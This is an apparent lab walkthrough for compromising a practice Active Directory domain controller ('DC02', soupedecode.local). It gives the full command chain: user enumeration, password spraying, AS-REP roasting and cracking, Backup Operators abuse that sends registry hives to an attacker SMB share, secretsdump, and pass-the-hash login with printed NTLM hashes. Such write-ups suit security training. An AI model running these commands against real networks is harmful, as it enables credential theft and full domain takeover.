DC02

After we downloaded this machines and configured its network interface just like DC01, we are going to perform smb sweep to find the machine are going to hack:

Enumeration:

netexec smb 10.0.2.0/24

We will add it to the /etc/hosts:

Lets start with nmap:

nmap -sCV -p- --min-rate 4000 -oN nmap/allports -vv 10.0.2.29

Lets see if we have anonymous access to the box:

netexec smb soupedecode.local -u '' -p ''

We do not have access either anonymously or as a guest user.

At this point we can go and search if we have anonymous bind on ldap, or start bruteforcing users using kerbrute:

kerbrute userenum -d soupedecode.local --dc 10.0.2.29 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

We immediately found some users:

We will add them to a text file to do password spray or AS-REP Roasting:

netexec smb soupedecode.local -u users.txt -p users.txt --no-bruteforce --continue-on-success

Now we have valid credentials.

Move Laterally to zximena448:

We can start to dump users or to give a look to the shares:

netexec smb soupedecode.local -u charlie -p charlie --shares

There is no any interesting share.

Lets dump the users:

netexec smb soupedecode.local -u charlie -p charlie --users

We go a lot of users, we can redirect it to a file to extract the users from it:

Since we have a list of valid users, we can try AS-REP Roasting:

impacket-GetNPUsers soupedecode.local/ -dc-ip 10.0.2.29 -no-pass -usersfile users.txt

Now after we obtained this users' hash, we can attempt to crack it with hashcat:

hashcat zximena448.hash /usr/share/wordlists/rockyou.txt

We got his password, lets see if we have administrative privileges, or we can access winrm:

netexec smb soupedecode.local -u zximena448 -p internet
netexec winrm soupedecode.local -u zximena448 -p internet

We still do not have access to the system,

Privilege Escalation:

We can use bloodhound to see what path could lead to full administrative privileges or interesting groups.

I will use ldapdomaindump to dump the domain objects info:

ldapdomaindump 10.0.2.29 -u 'soupedecode.local\zximena448' -p 'internet' --no-html --no-grep

Lets see if any of our owned users has anything useful:

cat domain_users.json | jq '.[] | select(.attributes.sAMAccountName[] == "zximena")'

As shown zximena448 is part of the Backup Operators, which can give us the ability to dump the sam database, but first we need to start share so the tool that will dump sam database can dump it to our local machine:

impacket-smbserver -smb2support share .
impacket-reg "soupedecode.local"/"zximena448":"internet"@"10.0.2.29" backup -o '\\10.0.2.18\share'

After it dumped that hashes, we can use secretsdump to extract the hashes from the sam databse:

impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save local

Here we go.

I tried to authenticate with the local administrator ntlm hash, but I could not, maybe the password has been changed.

But we have the machine account (DC01) ntlm hash as well, which is the domain controller that it has access to dump the ntds hashes:

impacket-secretsdump soupedecode.local/'DC01$'@10.0.2.29 -hashes :db40071d97a4266402e661a1e3711f1f

Here is the domain administrator ntlm hash, we can authenticate via evil-winrm:

evil-winrm -i 10.0.2.29 -u administrator -H 8982babd4da89d33210779a6c5b078bd

Here is the root flag, you can get the user flag from the zximena448 desktop.

PreviousDC01NextDC03

Last updated